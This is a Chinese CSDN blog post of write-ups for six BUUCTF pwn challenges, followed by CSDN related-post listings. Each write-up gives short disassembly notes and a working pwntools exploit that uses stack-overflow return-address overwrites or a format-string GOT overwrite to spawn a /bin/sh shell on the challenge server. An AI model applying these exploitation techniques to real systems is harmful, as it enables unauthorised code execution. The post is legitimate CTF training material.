BUUCTF(PWN)

于 2024-09-27 13:29:48 发布
阅读量347 收藏 3
点赞数 8
文章标签: 前端 linux javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142590349
版权

pwn1_sctf_2016

查看我们main函数,我们发现这里有个vuln函数,双击进入

进入vuln函数,我们发现这是一个32位的文件,看到第十一行是一个打印字符

我们看到第15行这里是要输入you字符,但是后面16-17行要用I替换you字符

所以我们只要输入I就行 我们看到fgets读取一行得知我们要输入的字符长度32十进制转为16进制20输入0x20

发现了get_flag敏感函数进入看到了system函数,用这个地址为返回函数。

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','26735')
#io = process('/home/xp/tm/wp/pwn1_sctf_2016')
flag = 0x8048F0D
padding = b'I'*20 + b'a'*4
payload = padding + p32(flag)
io.sendline(payload)
io.interactive()

jarvisoj_level0

查看main函数,发现返回函数双击后面的进入

严重的栈溢出

Shift键+f12打开发现/bin/sh/双击点开

进入发现system函数和/bin/sh输入我们的返回地址就行

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','27355')
#io = process('/home/xp/tm/bin/jarvisoj_level0')
padding = b'a'*(0x80+0x8)
system = 0x40059A
payload = padding + p64(system)
io.sendline(payload)
io.interactive()

[第五空间2019 决赛]PWN5

查看我们的main函数,发现这是一个32位的文件,其次这里涉及到了printf()函数,存在格式化字符串漏洞和偏移量,这里第7行70和第19行的63,这里不存在栈溢出

看到19行,我们知道要输入一个63十进制转换41十六进制的字符长度,然后我们看到atoi知道这里是一个偏移量,804c044开头,我们知道要输入名字的数和密码数一致才能获得flag,这里我们用到了随机生成数。将dword_804c044修改用canary断就能得到flag

我们发现因为存在格式化字符串漏洞,所以我们只要将atoi改成system,system(/bin/sh)就能进入if判断,得到我们的flag

我们可以用checksec+文件名,在ubuntu里发现还有canary打开和NX保护也打开了

法一:

我们用到了%n 用于读取前面字符串的长度并写入某个内存地址

因为前面我们得到了他要输入的偏移量的16进制是41,所以我用AAAA %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x

得到了41414141这个,我们知道了偏移是10

exp:

法二:

我们看了main知道了这里存在格式化字符串漏洞,我们只要将判断atoi改成system,手动输入/bin/sh字符串

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','28746')
io = process('/home/xp/tm/bin/pwn5')
elf = ELF('/home/xp/tm/bin/wp/pwn5')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload=fmtstr_payload(10,{atoi_got:system_plt})
io.sendline(payload)
io.sendline(b'/bin/sh\x00')
io.interactive()

jarvisoj_level2

查看main函数,我们发现这是一个32位文件,看见vulnerable_function()双击进入

我们发现这里出现了大量栈溢出

Shift+f12 我们找到/bin/sh和system双击进入

这里是/bin/sh的地址

我们找到system的最终返回地址

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','25289')
#io = process('/home/xp/tm/bin/jarvisoj_level2')
system = 0x8048320
binsh = 0x804a024
padding = b'a'*(0x88+0x4)
payload = padding + p32(system) + p32(0xbeff) + p32(binsh)
io.sendline(payload)
io.interactive()

ciscn_2019_n_8

用checksec查看了一下文件,恐怖至极啊

我们查看main函数发现这就是一个简单的var的字符串输入

我们只需要var[13]=17就可以触发/bin/sh的被动,

var[13]后的8个字节数据赋值为17就能得到flag

注意:这里的qword是quad(意思是4)一个word为2个字节,所以qword就是8个字节

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','25315')
#io = process('/home/xp/tm/bin/ciscn_2019_n_8')
payload = b'a'*(13)*(4) + p64(17)
io.sendline(payload)
io.interactive()

bjdctf_2020_babystack

查看main发现这是一个栈溢出,且buf输入的长度控制nbytes最小要大于0x20

exp:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.buuoj.cn','27234')
#io = process('/home/xp/tm/bin/bjdctf_2020_babystack')
door = 0x4006e6
ret = 0x400561
io.sendline('100')
padding = b'a'*(0x10+0x8)
payload = padding + p64(ret) + p64(door)
io.sendline(payload)
io.interactive()

涉及高版本的ubuntu我们要用一个ret(栈对齐)

樊少泽
关注
buuctf pwn解题
2301_80477504的博客
02-01 516
1.
BUUCTF pwn
L0g1c的博客
01-30 1667
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2574
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5164
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 239
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1314
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
buuctf pwn入门1
weixin_63231007的博客
07-07 1371
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 355
BUUCTF 做题练习
BUUCTF pwn rip
weixin_55190422的博客
11-03 339
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
BUUCTF PWN(1)
qq_60794823的博客
09-27 1040
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2083
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn前四题解答和培训内容整理笔记
lzglove666的博客
01-31 1512
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。
[每日一PWN]BUUCTF PWN5
qq_55233040的博客
11-28 376
遇到了buu的pwn题中按顺序的第一道格式化字符串漏洞的题目,难度稍有提升。
文件系统设计 - 开发文件系统 Store (上篇)
qq_44746132的博客
09-21 570
本章以一个基础的响应式Store类开始,对编辑器最核心的基础模块-文件系统管理进行开发设计,遵循面向接口编程的理念,设计文件系统的相关接口类型定义。
webview2加载本地页面
qq_25160759的博客
09-23 571
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
WebGL复杂几何体与模型加载
天涯学馆
09-23 382
在WebGL中,复杂几何体的创建通常涉及多个顶点和面片,而模型加载则涉及到导入外部文件格式,如OBJ、GLTF或FBX。在WebGL中,可以通过设置不同类型的灯光来改变3D场景的光照效果。在WebGL中,可以通过增加更多的灯光uniforms并在片段着色器中计算它们的组合效果来实现多光源。除了基本的漫射和镜面高光,还可以添加软边缘高光、环境光遮蔽(Ambient Occlusion)和全局光照等效果,以增强光照的真实感。GLTF是一种现代的3D模型格式,包含了模型的几何体、材质、纹理和动画。
apply、call和bind的作用和区别
欢迎来到我的博客!我是一名全栈开发工程师,主攻前端开发。希望通过我的博客,能够与大家共同学习和成长。感谢您的关注和支持!
09-23 672
javascript中,apply、call和bind的作用和区别介绍。
前端入门:HTML+CSS
mingangel的博客
09-21 772
之前的文章我已经讲过HTML,这篇文章我将讲解HTML和CSS的案例。
DC00015基于java web校园网上购物系统
最新发布
黄昏下的黎明的博客
09-24 615
DC00015【含配套文档】基于java web校园网上购物系统。
buuctf pwn
10-01
buuctf pwn是指一个CTF比赛中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。而ret2system是一种漏洞利用技术,通过修改返回地址为system函数的地址,来实现执行系统命令的目的。ret2text是一种类似的漏洞利用技术,通过修改返回地址为.text段中的某个特定地址,来实现执行指定代码的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值